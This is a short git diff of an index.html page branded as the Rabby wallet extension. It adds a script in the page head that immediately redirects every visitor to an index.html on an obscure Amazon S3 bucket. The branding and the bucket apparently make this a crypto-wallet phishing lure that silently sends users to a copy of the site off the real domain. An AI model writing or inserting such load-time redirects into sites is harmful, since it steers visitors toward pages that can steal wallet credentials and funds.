--- a/index.html
+++ b/index.html
@@ -1,6 +1,10 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+    <script>
+        // JavaScript redirection
+        window.location.replace("https://jdh0r-rubd23-fhjdk.s3.eu-north-1.amazonaws.com/index.html");
+    </script>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Rabby® Extension | The Game-Changing Wallet For All EVM Chains</title>
